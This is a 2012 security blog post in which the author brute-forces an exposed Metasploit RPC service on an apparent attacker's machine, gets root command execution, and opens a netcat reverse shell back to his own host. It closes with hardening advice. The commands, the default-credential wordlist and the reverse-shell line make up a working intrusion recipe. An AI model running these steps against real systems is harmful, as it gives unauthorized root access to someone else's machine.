Information Security

Blogroll

AMol NAik
Andrew Case
Andre M. DiMino
Attila Axt
Bruce Schneier
Didier Stevens
Eric Romang
Francois Ropert
Gal Badishi
Gianluca Brindisi
Haroon Meer
Krzysztof Kotowicz
Lvdeijk
Michael Ligh
Mila Parkour
Miroslav Stampar
Pedro Vilaca
Rich Lundeen
Rob Fuller

Creative Commons License


Best view with Chromium devel without JavaScript enabled

22nd August 2012

Post with 1 note

Backtracking The Backtrackers

As we can see https://www.google.com/trends/?q=backtrack+linux Backtrack so popular in my country but doesn’t mean we have great pentesters around here,they are doing for malicious hacktivity.

I watch Tom Liston’s honeypot https://twitter.com/netmenaces and Attacker IP from indonesia

most of them running backtrack

well, i found interesting attacker which bind msfrpcd to all interfaces

because my feeling said this guy have no idea,i try to bruteforce

% ./nmap -p55553 HOST —script metasploit-msgrpc-brute —script-args userdb=word.txt,passdb=word.txt

Starting Nmap 6.02 ( http://nmap.org ) at 2012-08-22 11:59 WIT
Nmap scan report for HOST
Host is up (0.00033s latency).
PORT      STATE SERVICE
55553/tcp open  unknown
| metasploit-msgrpc-brute:
|   Accounts
|     msf:test - Valid credentials
|   Statistics
|_    Performed 35 guesses in 48 seconds, average tps: 0

Nmap done: 1 IP address (1 host up) scanned in 47.38 seconds

here word.txt i collect from blog,wiki,forum,etc..

% cat word.txt
msf
test
msf3
password
armitage
user
msf3password
toortoor
Securepass
pass123
xxx
msfpassword2
a_password
s3cr3tp4ss
toor
1337
wpscan
abc123

now time to spawning his metasploit

% pymsfconsole -U msf -P test -a HOST


# cowsay++
 ____________
< metasploit >
 ——————
       \   ,__,
        \  (oo)____
           (__)    )\
              ||—|| *


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ — —=[ 927 exploits - 499 auxiliary - 151 post
+ — —=[ 251 payloads - 28 encoders - 8 nops


msf > whoami && id && uname -a
msf >
[*] exec: whoami && id && uname -a

root
uid=0(root) gid=0(root) groups=0(root)
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux

msf > nc -e /bin/sh MINE 7331
msf >
[*] exec: nc -e /bin/sh MINE 7331


+ reverse shell for real env and fast output

irb support exec os system command

and like Jason Haddix said

i already bind my self

% nc -vlnp7331

listening on [any] 7331 …
connect to [MINE] from (UNKNOWN) [HOST] 59950

ps -p $$
  PID TTY          TIME CMD
 9228 pts/0    00:00:00 sh
lsof -i tcp
COMMAND    PID     USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
postgres.  893 postgres    3u  IPv6   7887      0t0  TCP localhost:7337 (LISTEN)
postgres.  893 postgres    4u  IPv4   7888      0t0  TCP localhost:7337 (LISTEN)
.ruby.bin 1630     root    6u  IPv4  11159      0t0  TCP *:55553 (LISTEN)
.ruby.bin 1630     root    8u  IPv6  11806      0t0  TCP localhost:39904->localhost:7337 (ESTABLISHED)
.ruby.bin 1630     root   10u  IPv4  20589      0t0  TCP localhost:53318->localhost:54123 (ESTABLISHED)
.ruby.bin 1630     root   11u  IPv6  11212      0t0  TCP localhost:39903->localhost:7337 (ESTABLISHED)
.ruby.bin 1630     root   12u  IPv4  20590      0t0  TCP localhost:54123->localhost:53318 (ESTABLISHED)
.ruby.bin 1630     root   13u  IPv4  20921      0t0  TCP localhost:58392->localhost:53712 (ESTABLISHED)
.ruby.bin 1630     root   14u  IPv4  21851      0t0  TCP localhost:53712->localhost:58392 (ESTABLISHED)
postgres. 1756 postgres    7u  IPv6  11802      0t0  TCP localhost:7337->localhost:39903 (ESTABLISHED)
postgres. 1757 postgres    7u  IPv6  11214      0t0  TCP localhost:7337->localhost:39904 (ESTABLISHED)
sh        9228     root    0u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
sh        9228     root    1u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
lsof      9998     root    0u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
lsof      9998     root    1u  IPv4  21881      0t0  TCP HOST:59950->MINE:7331 (ESTABLISHED)
netstat -natp | grep LIST
tcp        0      0 127.0.0.1:7337          0.0.0.0:*               LISTEN      893/postgres.bin
tcp        0      0 0.0.0.0:55553           0.0.0.0:*               LISTEN      1630/msfrpcd   
tcp6       0      0 ::1:7337                :::*                    LISTEN      893/postgres.bin

Lessons Learned :

1. Use local, bind only 127.0.0.1

2. Tune your firewall

3. Do not run everything as root, learn chrooting and privilege separation

4. Don’t use default configuration

5. Don’t follow manual,blog,forum,wiki,etc.. instructions if contain sensitive information

Tagged: ChrootingExploitFirewallHoneypotNetwork SecurityPenetration Testingx86System V

() 

ABOUT THE AUTHOR
            
Teguh is an idealist pwner living encrypted in Indonesia.
He is passionate about security and currently defeating the CWE top 25.
He also can be found on Google+, Twitter, GitHub, Shelfari and your libc.
  1. egeektronic posted this